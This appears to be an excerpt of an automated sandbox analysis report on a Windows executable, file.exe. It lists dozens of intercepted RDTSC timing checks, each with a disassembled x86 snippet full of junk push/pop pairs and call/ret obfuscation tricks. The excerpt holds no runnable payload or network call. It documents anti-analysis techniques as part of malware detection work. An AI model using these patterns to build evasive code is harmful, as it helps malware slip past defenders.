Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 788F82 second address: 789036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A5412C0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, 4BAB6DD8h 0x00000010 jmp 00007F76A5412C0Ah 0x00000015 push 00000003h 0x00000017 movzx esi, si 0x0000001a push 00000000h 0x0000001c sub dword ptr [ebp+122D1EAEh], edi 0x00000022 push 00000003h 0x00000024 mov dword ptr [ebp+122D17FAh], ecx 0x0000002a push 98D07541h 0x0000002f jne 00007F76A5412C11h 0x00000035 add dword ptr [esp], 272F8ABFh 0x0000003c jmp 00007F76A5412C0Fh 0x00000041 sub dword ptr [ebp+122D1EA5h], ebx 0x00000047 lea ebx, dword ptr [ebp+1244AD2Fh] 0x0000004d push 00000000h 0x0000004f push esi 0x00000050 call 00007F76A5412C08h 0x00000055 pop esi 0x00000056 mov dword ptr [esp+04h], esi 0x0000005a add dword ptr [esp+04h], 00000015h 0x00000062 inc esi 0x00000063 push esi 0x00000064 ret 0x00000065 pop esi 0x00000066 ret 0x00000067 and ecx, 6D78F3DEh 0x0000006d xchg eax, ebx 0x0000006e push edx 0x0000006f jg 00007F76A5412C0Ch 0x00000075 pop edx 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a jmp 00007F76A5412C0Bh 0x0000007f pushad 0x00000080 popad 0x00000081 popad 0x00000082 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789036 second address: 78903C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789091 second address: 789097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789097 second address: 78909C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78909C second address: 7890BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F76A5412C06h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F76A5412C0Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7890BA second address: 78916D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76A53B3888h 0x00000008 jl 00007F76A53B3876h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F76A53B3878h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov ecx, dword ptr [ebp+122D2A50h] 0x00000034 jmp 00007F76A53B387Ch 0x00000039 call 00007F76A53B3879h 0x0000003e push eax 0x0000003f jmp 00007F76A53B3888h 0x00000044 pop eax 0x00000045 push eax 0x00000046 jmp 00007F76A53B3882h 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f push ecx 0x00000050 jmp 00007F76A53B3881h 0x00000055 pop ecx 0x00000056 mov eax, dword ptr [eax] 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78916D second address: 789173 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789173 second address: 789208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A53B387Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jno 00007F76A53B3888h 0x00000013 pop eax 0x00000014 push ecx 0x00000015 jc 00007F76A53B3885h 0x0000001b jmp 00007F76A53B387Fh 0x00000020 pop edx 0x00000021 push 00000003h 0x00000023 mov dx, 2D5Ah 0x00000027 mov dl, 80h 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D1C46h], edx 0x00000031 push 00000003h 0x00000033 jc 00007F76A53B3896h 0x00000039 jg 00007F76A53B3890h 0x0000003f push 9024FBBEh 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F76A53B3883h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7892E4 second address: 789341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A5412C0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov esi, dword ptr [ebp+122D2C74h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F76A5412C08h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D1EA5h], edi 0x00000034 push 7D9FA463h 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F76A5412C10h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789341 second address: 789345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789345 second address: 7893CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F76A5412C06h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 xor dword ptr [esp], 7D9FA4E3h 0x00000018 mov dword ptr [ebp+122D3329h], ebx 0x0000001e mov dword ptr [ebp+122D1B93h], esi 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F76A5412C08h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 mov edi, dword ptr [ebp+122D29E4h] 0x00000046 push 00000000h 0x00000048 mov edx, dword ptr [ebp+122D1B77h] 0x0000004e mov ecx, dword ptr [ebp+122D2C74h] 0x00000054 push 00000003h 0x00000056 mov edi, ebx 0x00000058 mov edi, ebx 0x0000005a push A26EAFC0h 0x0000005f pushad 0x00000060 pushad 0x00000061 jmp 00007F76A5412C12h 0x00000066 push edx 0x00000067 pop edx 0x00000068 popad 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A965D second address: 7A9698 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76A4C44F4Eh 0x00000008 push ecx 0x00000009 jmp 00007F76A4C44F4Bh 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 jnc 00007F76A4C44F46h 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F76A4C44F4Ch 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9698 second address: 7A969E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A969E second address: 7A96A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A96A3 second address: 7A96B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F76A53AB96Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A96B6 second address: 7A96BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A96BF second address: 7A96C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A96C3 second address: 7A96C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA02C second address: 7AA030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA030 second address: 7AA043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F76A4C44F46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA162 second address: 7AA175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76A53AB96Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA175 second address: 7AA179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAA88 second address: 7AAABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A53AB96Ch 0x00000007 jl 00007F76A53AB966h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 ja 00007F76A53AB966h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007F76A53AB973h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAD5B second address: 7AAD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAD68 second address: 7AAD6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AB1A6 second address: 7AB1E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C44F59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F76A4C44F54h 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F76A4C44F4Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007F76A4C44F4Ch 0x0000001e ja 00007F76A4C44F46h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ACA84 second address: 7ACAA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F76A53AB966h 0x0000000a jmp 00007F76A53AB978h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AEA2E second address: 7AEA34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AEA34 second address: 7AEA4A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F76A53AB966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AEA4A second address: 7AEA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE067 second address: 7AE06D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE06D second address: 7AE071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE071 second address: 7AE083 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F76A53AB966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B699F second address: 7B69AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B69AA second address: 7B69B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F76A53AB966h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6AEF second address: 7B6AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6AF3 second address: 7B6AF8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6D8B second address: 7B6D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB7A0 second address: 7BB7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBADF second address: 7BBAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC49F second address: 7BC4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC8D9 second address: 7BC8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC9DD second address: 7BC9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC9E1 second address: 7BC9E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC9E7 second address: 7BC9ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC9ED second address: 7BCA07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jmp 00007F76A4C44F4Dh 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCA07 second address: 7BCA0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCA0D second address: 7BCA53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C44F53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F76A4C44F48h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push edi 0x0000002b pop edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCA53 second address: 7BCA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCA58 second address: 7BCA5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCA5D second address: 7BCA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A53AB96Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F76A53AB96Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BEA37 second address: 7BEA59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C44F58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BEA59 second address: 7BEA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BEA5D second address: 7BEA61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF557 second address: 7BF577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F76A53AB975h 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF577 second address: 7BF57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF57B second address: 7BF57F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF57F second address: 7BF5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push eax 0x00000009 mov dword ptr [ebp+122D2128h], edi 0x0000000f pop edi 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D2C24h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F76A4C44F48h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 xchg eax, ebx 0x00000035 pushad 0x00000036 push eax 0x00000037 jmp 00007F76A4C44F4Fh 0x0000003c pop eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 pop eax 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF5CE second address: 7BF5F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A53AB979h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jo 00007F76A53AB970h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C001C second address: 7C0020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C0BB9 second address: 7C0BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1E64 second address: 7C1E68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C3E5B second address: 7C3E67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C3E67 second address: 7C3E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C531C second address: 7C5321 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5321 second address: 7C532F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C74BC second address: 7C74E4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76A53AB968h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F76A53AB979h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C532F second address: 7C5335 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5335 second address: 7C533B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C533B second address: 7C533F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C85D8 second address: 7C85DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C948A second address: 7C948F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA298 second address: 7CA29E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C948F second address: 7C9499 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76A4C44F4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA29E second address: 7CA308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F76A53AB96Fh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F76A53AB968h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jmp 00007F76A53AB978h 0x0000002e push 00000000h 0x00000030 cld 0x00000031 push 00000000h 0x00000033 mov bl, 70h 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jnl 00007F76A53AB966h 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA308 second address: 7CA30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA30E second address: 7CA312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA514 second address: 7CA527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jg 00007F76A4C44F46h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD499 second address: 7CD49F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE5A8 second address: 7CE5BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C44F52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD681 second address: 7CD687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD720 second address: 7CD72A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F76A4C44F46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CD72A second address: 7CD72E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
